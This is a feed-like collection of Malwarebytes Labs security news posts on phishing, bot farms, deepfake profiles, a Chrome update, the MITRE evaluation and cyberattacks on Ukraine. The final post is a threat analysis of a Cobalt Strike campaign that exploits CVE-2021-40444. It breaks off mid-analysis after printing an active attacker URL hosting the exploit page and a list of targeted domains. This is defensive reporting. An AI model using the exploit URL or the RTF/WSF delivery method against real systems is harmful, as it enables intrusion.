IT NEWS

Calendars are a rich source of bad behaviour for scammers and spammers. They’re one of the most prolific tools the workplace has for collaborative actions and general cross-purpose messaging. They’ve been misused by bad actors for many years now, most commonly spamming unwary potential victims and leading them to bad times ahead.

A brief history of calendar connivances

Scammers abuse pretty much any beneficial feature you can think of in order to get the job done. In 2016, Mac spammers made use of the ability to suggest events found in other apps. They also fired calendar invites to people’s iCloud addresses, meaning the spam would hit the calendar and the notification center.

In 2021, iPhone calendar spam was on the up with fake infection/pornographic spam giving device owners major headaches. Bogus CAPTCHA spam and redirects to device cleaning tools were less than appreciated.

Just this year, we had something resembling an update to the tried and tested calendar methods with comment spam in shared Google documents.

These tactics have been around for many years. Witness 419 scammers misusing Google calendar invites in 2011, or even using Yahoo! Calendar to spam in 2009. If there’s a calendar with any form of sharing functionality, you can bet someone will be along shortly to post invites you don’t need. What’s the latest in unwanted calendar spam messaging land?

Calendar app spam leads to phishing pages

Many tools use calendar apps/plugins for additional features and functionality. Calendly is one such app which provides Zoom integration, website embedding, and more. It’s free and easy to sign up which means scammers will try to abuse it however they can.

According to Bleeping Computer, it’s been abused to send phishing missives. The example given shows a supposed fax message which claims “You have received a new fax document”. It also lists page count, size, and a clickable link to preview the document in question.

The landing page for these links is a blurred document with a bogus Microsoft login popup box which claims “only recipient email can access shared files”. It also has potential victims enter details twice, presumably to make sure they’re definitely entering usable credentials.

The phish routine ends with that time honoured process of redirecting the phished individual to a real website afterwards. This is to make them think there’s nothing untoward going on, unaware that they’ve handed over login details to a faker.

Dodging bogus calendar invites

This is, of course, a very bad and sneaky thing to do. While some folks may be aware of more general spam and nonsense sent their way via Google Calendar, they might not suspect the same thing can happen via other platforms. As Bleeping Computer notes, a password manager with login functionality will help as the mismatch in URLs means login details will stay safely tucked away from harm’s reach.

It’s also possible the slightly unnatural approach to “document” sending may work against the spammers here. Do people typically send you important documents by email, or by third party calendar app messaging? If it’s the former, and it likely is, then this should be enough to set alarm bells ringing.

As with all these attacks, the key is to remain calm. Don’t rush to open the document. Check who it claims to be from. Is it a stranger? Or someone you know? If it’s someone you know, it’s time to do some outreach and double check if the document is what it appears to be. Last but not least, make use of any available security/privacy features your calendar may possess. It could be the difference between a clutter free week ahead or days of skipping through rogue invitations.

The post Phishers make a date with your calendar apps appeared first on Malwarebytes Labs.

Cybersecurity can be complex work, as security teams need to regularly decipher and prioritize alerts, protect against daily threats, and possibly implement product configuration changes, all while staying abreast of the latest intelligence on new and evolving threats. For organizations that lack fully staffed, internal security teams, or sometimes even one security hire, cybersecurity is then a function of simplicity and time: Any good cybersecurity product must be effective and intuitive out of the box.

With the results of this year’s MITRE ATT&CK® Evaluation, announced today, Malwarebytes’ standout performance proves that our Endpoint Detection and Response (EDR) solution is just that type of product.

In the two categories of Protection and No Delays or Configuration Changes, we achieved a 100 percent success rate, meaning that our business product stopped every tested cyberthreat before it reached a machine, and we did it “out of the box,” meaning that we did not have to change any configuration settings to achieve total protection. For the many businesses that lack a SOC, this simple, intuitive protection is vital to their daily operations, as it allows those businesses to focus on any threats that do manage to get through.

We also detected 83 out of 90 steps that were included in the MITRE ATT&CK Evaluation, and of the corresponding 83 alerts for those steps, 82 were of the highest quality, providing actionable insight that could help stop an attack as it happens. Combined with our 100 percent protection score and our user-friendly simplicity, Malwarebytes can give even small businesses everything they need to get back to doing what they do best—their jobs.

In this post, we will focus less on how Malwarebytes performed in the MITRE ATT&CK evaluation, and more on what the test means and how it can be best interpreted by businesses of all sizes.

Why MITRE ATT&CK matters to you 

Choosing a cybersecurity product can be just as difficult as understanding its advertising. Vendors constantly vie for customers, promising new capabilities baked into varying, three-letter acronyms coupled with the “latest,” “greatest,” “best-in-class” features. Adding to this complexity is the fact that, seemingly every day, a new cyberthreat emerges that can derail any business, small or large, and it’s difficult to know if any product under consideration will be effective against evolving attacker techniques.

Fortunately for customers, there are multiple third-party tests that can provide better insight into how cybersecurity products would perform under real-world testing. Interpreting those results, though, and actually applying them to the real world can be challenging. For the many businesses that still see cybersecurity as a solution that can hopefully be implemented directly “out of the box,” how do the various comparison graphs and tables of stats reveal which solution will deliver on that promise?

We’re going to help explain the 2022 MITRE Engenuity ATT&CK Evaluation results with the same approach we take to cybersecurity overall: We want to make it simple and actionable for you.

The MITRE ATT&CK Evaluation third-party test involves the work of cybersecurity researchers testing individual cybersecurity vendors’ products against documented attack methods. This year the testing was modeled after real-world threat actors Wizard Spider and Sandworm. MITRE Engenuity’s researchers record how a product performs across separate activities: Did a product catch every “substep” of an attack? Did it provide a quality alert that provided robust information to the end-user? During Protection evaluation, did it prevent an attack that could have distracted an end-user from the primary attack? And did a vendor go into the product and change any settings to improve results after missing a step?

To understand the results this year, we are going to explain three evaluation categories that provide the best judgment opportunity for businesses choosing a cybersecurity vendor. Those categories are Visibility, Analytic Coverage, and Protection. We will also explain the importance of configuration changes.

Visibility 

Cyberattacks do not happen in a vacuum. Instead, when attackers pull off something like a ransomware attack, they are often planning and implementing the attack over a period of weeks or days, leaving behind clues that they have breached a network and started to spread laterally before delivering a final payload. And while spending weeks on an attack may seem long to some, it’s important to remember that these very same attacks used to take months. Threat actors are working faster and more efficiently than ever before, often equipped with many automated technologies, which is why these types of third-party tests are so important: Organizations have to more quickly recognize warning signs and respond to them to avoid falling victim to an attack. As always, it is better to stop an attack at the start of its chain rather than trying to recover after it has struck, especially when an attack results in encrypted data, like the attack used in this year’s MITRE evaluation.

Without good visibility, your cybersecurity team is lost. With no prior warnings sent to your team, every cybersecurity event will be an emergency, noticed likely by an employee with seemingly isolated computer issues. In actuality, that one employee’s problems could be replicated across your business, indicative of an attack that began months ago and which you and your teammates are only seeing the results of today.

Strong cybersecurity products provide visibility into those attacks as they happen, warning users about suspicious activity along the way and helping provide information so that an attack can be stopped before it escalates. In fact, in this year’s MITRE ATT&CK testing, one of the attacks started in the simplest way—a user accidentally opening a malicious file.

Others steps in the attack included access using unsecured credentials, lateral movement through Remote Desktop Protocol, and multiple instances of Ingress Tool Transfer, which could point to threat actors bringing their own files or tools into your now-compromised network. The sequence of attacks recorded in the evaluation show a clear concept of “attack flow,” from an attack’s earliest stages, including the execution of a malicious file, to its later progression through other tactics like credential access, discovery, defense evasion, and lateral movement, until, at the completion of the attack, a victim’s data is encrypted.

The MITRE ATT&CK Evaluation’s 90 steps show a clear intent of attack, and a good cybersecurity product will catch these types of activities and warn your security team about them when they happen. In the testing, the number of steps detected provided the product’s “Visibility” score, because the more steps a security team is warned about, the clearer a picture they have to stop an attack as it happens.

Malwarebytes detected 83 out of 90 steps, or 92 percent of all steps.

Alert quality 

As we explained above, visibility is a crucial component for any cybersecurity product, as a collection of warnings can provide some patterns for the human users on the other end to interpret. But warnings themselves are not always enough. Often, security teams need to know more about a specific warning to understand whether it is an issue or not, and how, specifically, they should respond, depending on what a warning tells them. After all, a non-informative warning can be as ineffective as a non-existent one.

This is where alert quality comes into play.

Not every alert is equal. Some provide far more detailed information that can be acted upon by security teams, while other alerts only notify a security team of a problem. In the MITRE ATT&CK evaluation results, alerts are given three tiers of specificity, from least to most specific—General, Tactic, and Technique.

Techniques are the types of alerts that empower security teams to solve problems faster. Going beyond a basic description of what happened, like whether a PowerShell script was executed on a machine, a Technique alert will explain the surrounding context. That can include what threat actors are trying to accomplish with the script—like persisting in an environment even after a system reboot—and how threat actors could achieve that—by changing a registry value to leverage a Winlogon key to execute arbitrary binaries upon logon or logoff.

These quality alerts will help not just small- to medium-sized businesses equipped with equally small IT teams, it will also help the Managed Service Providers who often support these businesses. For small IT teams, quality alerts will help prioritize what problems need to be addressed, while MSPs can also gain better intelligence for the SOCs. In our MITRE results this year, Malwarebytes delivered 82 Technique alerts out of the 83 alerts delivered in total, meaning that nearly every piece of information that we offered to security teams was of the highest quality.

Protection 

Nearly every important component of the MITRE ATT&CK Evaluation results fits into the broader umbrella of actionable intelligence. Quality alerts help all teams—from small to large to MDR to MSP—prioritize the cybersecurity issues that will affect them most, while raw telemetry across the landscape of the attack gives more evidence of what is happening and when.

But the value of both components could diminish under an onslaught of cyberevents that bog down any response. What helps in these situations is protection—preventing attacks before they happen. Without protection, even a wealth of high-quality alerts will only stretch your IT team to its limit, unable to meaningfully prioritize, forced to make every alert a priority.

Here, Malwarebytes stands particularly proud, having achieved a 100 percent success rate in the Protection category for Windows.  We must note that for this latest MITRE ATT&CK round, we did not submit our solution for Linux testing—a process that, while entirely optional, still impacted vendors’ Visibility scores. Malwarebytes recognizes the importance of cybersecurity for every operating system within any organization, and our EDR solution for Linux will be available on April 5.

A note on configuration changes 

Designing a third-party cybersecurity test isn’t easy, as any meaningful evaluation must consider how a product is used by real organizations, from the smallest nonprofit to the largest enterprise. But what’s good for one subset of organizations isn’t necessarily good for the other.

One of the allowances MITRE Engenuity gives their participants is the ability to change configuration settings in a security product once an evaluation has already begun. This reflects the real-world application of larger enterprise companies that have security professionals who prefer a robust interface of settings and configurations that they, personally, can adapt to their own business environment.

There is a flip side to this, though, in that there are countless customers who do not have the time to configure their security product’s settings. There are just as many customers who do not have the internal or external resources for such a project. For these customers, endpoint security is still a product that needs to function as a “set it and forget it” tool. Importantly, these customers may actually lose some value if they try to implement the same types of configuration changes that MITRE Engenuity allows, as these changes will likely produce a greater quantity of alerts, leaving these customers to spend more time deciphering the importance of these alerts and how to respond. This adversely affects the visibility and alert quality components as customers spend time sifting through a potentially significant number of additional, low-quality alerts in order to determine priority actions. A productivity loss no organization—big or small—is willing to accept. Malwarebytes completed the MITRE ATT&CK Evaluation completely without delays or configuration changes, so our results reflect the out-of-box efficacy customers expect.

We consistently want to provide cybersecurity in a simple, accessible, and effective way, and that means developing a product that responds to cyberthreats even without any configuration changes. This isn’t easy, as every business environment is different, but it’s worth the trouble if it means our users are safer than they were without us.

Making use of MITRE 

Third-party tests should empower your team to choose the right cybersecurity product for their own business goals. No matter your organization’s size or complexity, though, a few criteria must be met: Your solution must catch the warning signs of an attack in progress, it must provide the highest-quality alerts possible, and it must prevent as many attacks as possible, so as to not overwhelm your security team and your employees.

The MITRE ATT&CK Evaluation thankfully evaluates many cybersecurity tools on these exact metrics. We hope that, with our breakdown on what matters when reading the results, you and your business are able to thrive, away from cyberthreats.

If you want to learn more about how Malwarebytes performed in the MITRE ATT&CK Evaluation, you can contact us here.

The post MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks appeared first on Malwarebytes Labs.

Given current world events, there’s an incredible amount of misinformation and disinformation around at the moment. Whether we’re talking 5G, the pandemic, vaccines, or invasions, there’s a lot out there.

One of the biggest problems where bad information placed online is concerned is bot farms. A huge army of automated accounts sowing seeds of doubt and nonsense isn’t helpful, and it can be tricky to do much about it. Occasionally, we hear tales of successful takedowns. This is one such story.

The difference between misinformation and disinformation

It’s important we know where both of these diverge, and how. Misinformation is when someone spreads incorrect information. There doesn’t need to be any malicious intent behind the spreading. They’re simply getting something wrong, and throwing it out there anyway. Someone may even be repeating a talking point to be helpful or give assistance. Unfortunately incorrect information being spread across social media and elsewhere can lead to all sorts of problems.

Disinformation is designed to be bad from the outset. It’s carefully crafted lies and subterfuge, manipulating the truth for dubious purposes. It can be done by anyone with a random account online, or deployed in more sweeping fashion by a Government. It’s a popular tool during wartime, and it’s being used daily throughout the invasion of Ukraine.

What is a click farm?

A common question asked is “What does a bot farm actually look like?”, with good reason. People imagine rows of servers, doing server type things. Someone once asked me if they “resembled robots”. There are different types of farm, which can make the confusion even worse.

Click farms are incredibly common, and are used to perform basic tasks on social media.

These farms may employ people to monitor dozens or hundreds of mobiles and interact in some way on content intended to go viral.

Click farms often descend into click fraud and other activities such as SIM smuggling, with law enforcement inevitably becoming involved.

What is a bot farm?

Bot farms, as the name suggests, attempt to go one better and automate a lot of these activities. It wasn’t so long ago that researchers uncovered an insecure bot farm and dug into how it operated. The intention of that farm was to perform political manipulation. Bots playing host to friends (also bots) across their networks pushed dubious and divisive content. They also joined specific Facebook groups to push the content further still. No doubt some of the material promoted was disinformation.

This is what’s currently happening in relation to the invasion of Ukraine.

When bot farms are dismantled

It’s been revealed that no fewer than five significantly sized bot farms have been shut down by the Security Service of Ukraine (SSU) since the invasion began.

According to the SSU, these bot farms are responsible for at least some of the many bomb threats called in from the start of the year onward.

The farm itself involved a wealth of equipment across two individual’s residential properties, with a third person fielding technical maintenance. 3,000 SIM cards, numerous laptops, and multiple GSM gateways were among the items seized.

Combating disinformation tactics

There’s never been a more urgent need for fact checking services. The Ukrainian Center for Countering Disinformation has set up its own Telegram bot, aimed at fact checking dubious claims within minutes. There are also several well-known fact-checking sites providing shakedowns of bogus claims and viral content in relation to the Russian invasion of Ukraine. These include Full Fact, Snopes, and AFP fact check.

Before retweeting or sharing content, it’s always worth checking the facts first. Even engaging with disinformation to counter or correct it can boost the disinformation’s viral nature, making it even harder to shut down. This is why, for example, people will often screenshot bogus claims to counter them instead of quoting them directly. In many cases, it may well be better to simply report the content instead of directly engaging with it.

The post Ukraine shuts down disinformation bot farm appeared first on Malwarebytes Labs.

Despite continued warnings of deepfake chaos during major events, things haven’t worked out the way some thought. Those video deepfakes are bad, and they remain bad. Quite simply, nobody is fooled – or at least, nobody able to make a mistaken snap judgement in a way that matters.

As much as we over dramatise their use in our heads, the video aspect of deepfaking has a long way to go to pull the proverbial wool over our eyes. But it’s a little bit harder to spot an AI-generated image, as you can see on sites such as This Person Does Not Exist, and some people are using these fake images on social media.

When LinkedIn connections go wrong

Two Stanford University researchers, Renée DiResta and Josh Goldstein have found more than 1,000 fake Linked In profiles using AI-generated faces

The story begins with someone sending a message to an individual on LinkedIn. Nothing odd there, except the recipient happens to know their way around AI generated images.

The avatar attached to the profile did indeed turn out to be entirely fictitious; “Keenan Ramsey” does not exist. From there, the pretend people were unearthed doing their thing on LinkedIn.

These “employees” were tagged under various businesses, except those businesses said they didn’t authorize the use of computer generated profile imagery. The researchers digging into this discovered companies selling LinkedIn marketing services. They also offered bot/avatar accounts, which is a no-no from LinkedIn’s perspective.

The long tail of deepfake marketing

It’s somewhat bizarre that people may be making money from selling web generated profile pictures to businesses that could just do it themselves given 10 seconds and a web browser. It’s also bizarre that nobody at any point in this daisy-chain of fake people’s profiles seems to know exactly where, or how, or why any of this has been happening. Who is responsible? What are these accounts doing besides perhaps bolstering employee count numbers?

A very good question.

For now, it may be worth paying close attention to random messages and/or connection requests on LinkedIn. Is the person at the other end who they claim to be, or a business-realm fakeout? It may be tricky to pin down a conclusive answer, but I’d definitely rather know just who is wanting to get inside my connections network…and why.

The post Watch out for LinkedIn fakes who want to get connected appeared first on Malwarebytes Labs.

If you’ve received a spam SMS message sent from your own phone number, don’t panic.

No, you weren’t hacked. And you’re not the only one who has received such a message, which looks a bit like this:

Free Msg: Your bill is paid for March. Thanks, here’s a little gift for you: {redacted link}

But why do they make it look like the text has come from your own number? It’s likely the scammers spoofed it in order to get past built-in filter features because they don’t block messages you send yourself.

The Verge writer Chris Welch said that clicking the link directed him to Channel One Russia, a Russian state media network. But this could have easily led to nefarious payloads, like malware, and some have already classed this as a smishing (or “SMS phishing”) attempt.

Interestingly, Welch said, the texts appear to be targeting users of Verizon Wireless, one of the biggest telecommunication companies in the US. 9to5Mac’s Allison McDaniel says she’s also seen customers of Visible, Verizon’s MVNO (mobile virtual network operator), complain about the spam SMS on Reddit, too.

Rich Young, Verizon’s spokesperson, said in an email to The Verge:

“Verizon is aware that bad actors are sending spam text messages to some customers which appear to come from the customers’ own number. Our team is actively working to block these messages, and we have engaged with US law enforcement to identify and stop the source of this fraudulent activity. Verizon continues to work on behalf of the customer to prevent spam texts and related activity.”

McDaniel has advised Verizon and Visible users to report receiving this spam SMS—and others like it—to the FCC by filing a complaint. Pay particular attention to the bit on “Your Number is Being Spoofed.” You can also forward the message to SPAM (7726).

Tell your friends and family about this smishing attack. If they received one, tell them to report it, delete it and move on.

The post “A little gift for you” SMS spam appears to come from your own phone number appeared first on Malwarebytes Labs.

Google has launched Chrome version 100 which, among other things, fixes 28 vulnerabilities. Other new security features include Safety Check, Enhanced Safe Browsing, and the ability to control website access to your location and device.

Of the 28 vulnerabilities, none have been marked as critical but 9 have been marked as high severity. High severity usually means that any compromise would be limited to the browser, although vulnerabilities that allow an escape from the browser’s sandbox will often be classified as High as well. But these vulnerabilities could have more serious consequences when used in conjunction with others, so it warrants a quick update.

Version 100

We have talked about possible user-agent string problems with the introduction of version 100, for both Chrome and Firefox. With Google Chrome 100, the browser’s user-agent string now uses a three-digit version number compared to a two-digit number. After testing showed that some sites had issues with the new user-agent string, they were quickly fixed by developers so these sites now support the three-digit version. This is not to say that every site has been tested, so it may still cause problems for some.

Google has announced that Chrome 100 will be the last version of the browser with an unlimited user-agent string. The user-agent string—which is sent out on each http-request—contains information about the user’s OS, the used browser and  its version number, the device model, the architecture, and more. With this combination of parameters and the large variety of potential values, it could be possible to identify internet users based on their user-agent strings.

To reduce this option for fingerprinting Google plans to reduce the information in the user-agent string to only the browser’s brand and significant version, its desktop or mobile distinction, and the platform it’s running on.

Safety check

The new safety check allows users to quickly check a few security settings like available updates, the strength of their saved passwords, whether safe browsing is enabled, and more.

Go to your Settings and then select Security and Privacy. Here you can click the Check now button under Safety check.

Enhanced Safe Browsing

According to Google, Enhanced Safe Browsing protection adds a few extra layers to the standard protection:

• Predicts and warns you about dangerous events before they happen
• Keeps you safe on Chrome and may be used to improve your security in other Google apps when you are signed in
• Improves security for you and everyone on the web
• Warns you if passwords are exposed in a data breach
• Sends URLs to Safe Browsing to check them. Also sends a small sample of pages, downloads, extension activity, and system information to help discover new threats. Temporarily links this data to your Google Account when you’re signed in, to protect you across Google apps.

It is up to you whether you would like to provide Google with this data, but you can enable Enhanced Safe Browsing by following the procedure outlined below.

Go to Settings and then select Security and Privacy. Click Security and turn the radio button before Enhanced protection.

Control website access to your location and device

Sometimes websites ask permission to use your location, microphone, and more. Chrome now has site safety controls that help you understand and change the permissions for the sites you visit.

You can check the current permission by clicking the lock symbol in the address bar and select the Site settings to see an overview of all the permission. You will also be able to see existing permissions that you can simply reset by using the Reset permission button.

New developer APIs

With this release, Google has also added the Digital Goods API so that web applications can make in-app purchases using the Google Play Store. This API has been made available alongside the Multi-Screen Window Placement API that  extends the web platform’s single-screen paradigm to support multi-screen devices. As multi-screen devices and applications become a more common part of user experiences, it is deemed important to give web developers information and tools to leverage that expanded visual environment.

How to update Chrome

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it.

Then all you have to do is relaunch the browser in order for the update to complete.

After the update, the version should be 100.4896.60.

Stay safe, everyone!

The post Update now! Google launches Chrome version 100 and fixes 28 vulnerabilities appeared first on Malwarebytes Labs.

People up to no good get themselves caught in an endless number of ways. This has always been the case in the real world, and continues to be true online. No matter how talented, how daring the schemes, greed and the desire for fame often win out. This has disastrous consequences for those caught, and a little more illumination for those of us taking part or watching from the sidelines.

Anybody can be caught in the act. Even groups with near mythical levels of skillset-cred fall by the wayside. It is, in the worlds of one Agent Smith, inevitable.

Well, occasionally inevitable.

The ever-shifting sands of “I’ve made a terrible mistake”

A recent article over on ITPro highlights some of the ways would-be cybercriminals and those at the more professional end of data snatching get themselves caught. So-called script kiddies can take a couple of weeks; big name groups can take longer, but they can still fall foul of the smallest mistake.

Some of the most common mistakes listed in the article are combinations of technical misfire, greed, lack of skill, and unfamiliarity with social engineering. How can things go wrong for the unwary? Let’s take a look.

Technological mishaps

Something we see happening is tiny slices of technology causing major ripples in unexpected ways. A person may have a great plan, a plan B, and a bunch of other what-ifs and workarounds. It all comes undone in the most unexpected of ways. If the founder of the infamous Silk Road can run into problems with VPNs, so can anyone.

Even if the VPN doesn’t glitch out at the worst possible moment exposing an IP address, forgetting to switch it on in the first place can give the same end result. Many years ago, a fairly prolific defacer of websites I was tracking fell foul of this problem. They became addicted to the rush of posting their latest compromises to a hacking forum dishing out kudos points for cool hacks.

Their lack of skill beyond the basics coupled with the fame rush resulted in a forum hack from their college network, with the VPN switched off. I’m still unsure if the hack they used was misused somehow and resulted in their IP posted to the defaced page, or this was revenge from the admins. Either way, enough pieces of the puzzle were available that this individual ran into trouble shortly after and ended their defacement activities. 

Oh no, my trophy storage

People involved in compromise, defacement, and other actions simply cannot help themselves with a bit of showing off. It stands to reason that those with this inclination end up assembling a large trophy case marked as “all the evidence goes here”. This trophy storage may take the form of a list of site defacements posted to a forum. It may be on passwordless server storage running off their home network. It might even just be a collection of zipfiles in cloud storage somewhere.

Other times, it may be files grabbed by malware and uploaded to a server with no encryption or passwords applied. It’s left to sit around for the longest time. Once law enforcement comes knocking, it’s likely too late for the accused to do anything about it.

When makeovers go horribly wrong

Back in the Myspace days, we’d sometimes see someone take their first steps into the defacement scene with a revamp of their personal profile. Where once it contained their name, location, and home photographs, it now looked very much like someone had just watched Hackers and decided to HACK THE PLANET.

Unfortunately for them, they didn’t know about the existence of search engine caches, or services like Internet Archive. They also failed to consider the dozens of messages in the comments section calling them by name. This is partially one reason why smarter people in the Myspace hacking scene would place their top friends outside of the top friends box, and place random people there instead.

Even without technical mishaps or overflowing trophy cabinets, there are other ways to fall on your own sword composed of ones and zeroes. The social aspect of underground forums often leads to people letting their guard down. A bit too much information shared, a little too friendly in the direct messages, and it all adds up.

Revealing too much information about yourself on forums and in chat, posting in bragging threads where you display your best hacks, can lead to disaster. Other people caught by law enforcement can turn informer, and socially engineer details from individuals who feel they’re in a safe, relaxed environment.

Turning the tables

The forums themselves can suddenly switch from safe-haven to massive bearpit of law enforcement pandemonium. Some underground forums have a very strict no-spam policy. They strengthen this stance in what may sound like very surprising ways. Some refuse to allow users to login via proxies or VPNs. That’s right: they need to use their actual IP address. How do you think this pans out if the forum is taken over by the authorities? Or simply compromised by somebody for giggles with the forum logs dumped into the wild?

The other suspicion is that any supposed underground forum demanding real world information could well be a sting operation. How does someone ever really know before they sign up?

It’s a dog eat dog world out there

If someone avoids spilling too many beans or posting incriminating information, it can still go wrong. As we’ve seen recently, little fish are tasty treats for more experienced hands. People regularly post hacking tools and phish kits to dedicated forum sections. Every so often, we see someone drop a booby-trap onto a site and gobble up all the data from compromised forum-goers.

This isn’t new, and neither are any of the other pitfalls and mishaps listed above. Even so, overenthusiastic forum-goers will keep walking into them and providing headlines for years to come. Is it really worth the worry?

The post Looking over your shoulder: when small mistakes have big consequences appeared first on Malwarebytes Labs.

Since the start of the Russian invasion of Ukraine, the war on the battlefield has been accompanied by cyber attacks. Those attacks against critical infrastructure have knocked out banking and defense platforms, mostly by targeting several communication systems.

In a timeline set up by NetBlocks, you can follow individual attacks on communication services, starting Thursday 24 February 2022, the same day the invasion of Ukraine started. The attack methods are very diverse, as are the consequences.

But that wasn’t the start of it, the denial of service attacks that were clear attempts to disrupt banking and defense services began earlier, and a huge drop of connectivity was noticed as early as February 15, 2022.

NetBlocks

NetBlocks is a global Internet monitor based in London. It uses “diffscans”, which map the IP address space of a country in real time, and show Internet connectivity levels and corresponding outages. Deliberate Internet outages will often show a distinct network pattern, and NetBlocks uses those patterns to determine and attribute the root cause of an outage.

The NetBlocks timeline shows disruptions of fixed-line service provider Triolan, the Viasat satellite internet network, backbone internet provider GigaTrans, network operator Kyivstar, the Vinasterisk network, as well as targeted attacks on certain areas that were often accompanied or followed by physical strikes.

Financial problems have also presented challenges for network operators. On Tuesday 15 March, internet provider LocalNet announced that it would have to lock down subscribers with debt on their account due to difficulty paying the company’s own bills.

On Monday 28 March 2022, Ukraine’s national provider Ukrtelecom experienced an extended, nation-scale network disruption, following a major cyberattack. It’s not yet known whether Ukrtelecom—a telephone, internet and mobile provider—was hit by a distributed denial of service (DDoS) attack or a deeper, more sophisticated intrusion. But NetBlocks stated that the gradual loss of connectivity was a giveaway that it wasn’t a power or cable cut.

Communications

As we have said in the past, communication systems are a vital infrastructure. Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. This is also why we see a lot of misinformation and disinformation on both sides of the conflict.

The ongoing conflict has also affected radiation monitoring, communications, and long-term maintenance and cleanup efforts at nuclear power plants across Ukraine, which is an extra worrying factor. The loss of communications was subsequently raised as a point of concern by the International Atomic Energy Agency.

Methods of disruption

When it comes to disrupting communications services the methods are as diverse as the means of communication. Communication lines and infrastructure include physical lines, satellites, and other wireless methods.

Physical lines can be cut off in physical attacks, but they are also vulnerable to the cyberattacks that can be used against wireless communications.

• An unwanted wireless signal injected into the original signal may result in a temporary loss of wireless signals, poor receiver performance, or bad quality of output by the electronic equipment.
• Channel interferences influencing the performance of wireless communication systems can be co-channel interferences or adjacent channel interferences.
• Overload attacks, like DDoS attacks are designed to overwhelm the available capacity of the infrastructure or absorb so much capacity that the negative influence on the service is notable.
• Attacks on physical components like cables, switches, routers, and network centers.

As we discussed recently, even our networks of satellites and space systems are vulnerable to cyberattacks, which can create a backdoor into the physical and digital systems we rely upon on a daily basis.

DDoS

A tried and tested method to disrupt communications is to overload the network(s) with a Distributed Denial of Service (DDoS) attack. This type of attack involves sending large amounts of traffic from multiple sources to a service or website, intending to overwhelm it.

One DDoS method that was used against Ukrainian websites was via hundreds of compromised WordPress sites that use visitors’ browsers to perform DDoS attacks by means of an inserted malicious script. The DDoS attacks will occur in the background without the user knowing it’s happening, other than a slowdown of their browser. BleepingComputer discovered that the same script is being used by a pro-Ukrainian site to conduct attacks on Russian websites.

Incommunicado

The cyberattacks on communications are an understandable part of modern warfare. And one that nations and international organizations should prepare for. But, as always, these attacks have consequences for the inhabitants of the countries that are at war.

On both sides of the conflict, people have been cut off from communications. On the Russian side people have been denied access to most social media, which they have been trying to circumvent by using VPNs. But what is way worse from a human perspective is that worried Ukrainians are unable to reach their relatives in areas that are under attack.

The post Attacks on Ukraine communications are a major part of the war appeared first on Malwarebytes Labs.

This blog post was authored by Hossein Jazi.

— Updated to clarify the two different campaigns (Cobalt Strike and Rat)

Several threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is activity monitoring these threats and has observed activities associated with the geopolitical conflict.

More specifically, we’ve witnessed several APT actors such as Mustang Panda, UNC1151 and SCARAB that have used war-related themes to target mostly Ukraine. We’ve also observed several different wipers and cybercrime groups such as FormBook using the same tactics. Beside those known groups we saw an actor that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables.

On March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.

The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.

Spear phishing as the main initial infection vector

These emails pretend to be from the “Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation” and “Federal Service for Supervision of Communications, Information Technology and Mass Communications” of Russia.

We have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. Sophos has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.

• Email with RTF file:
  • Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Federal Service for Supervision of Communications, Information Technology and Mass Communications)
  • Предупреждение! Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)

• Email with archive file:
  • информирование населения об критических изменениях в сфере цифровых технологий, сервисов, санкций и уголовной ответственности за их использование. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)
  • Внимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)

• Email with link:
  • Внимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)

Victimology

The actor has sent its spear phishing emails to people that had email with these domains:

mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net

Based on these domains, here is the list of potential victims:

• Portal of authorities of the Chuvash Republic Official Internet portal
• Russian Ministry of Internal Affairs
• ministry of education and science of the republic of Altai
• Ministry of Education of the Stavropol Territory
• Minister of Education and Science of the Republic of North Ossetia-Alania
• Government of Astrakhan region
• Ministry of Education of the Irkutsk region
• Portal of the state and municipal service Moscow region
• Ministry of science and higher education of the Russian Federation

Analysis:

The lures used by the threat actor are in Russian language and pretend to be from Russia’s “Ministry of Information Technologies and Communications of the Russian Federation” and “MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS”. One of them is a letter about limitation of access to Telegram application in Russia.

These RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine.
http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html

The html file contains a script that executes the script in WSF data embedded in the RTF file.

The actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file.

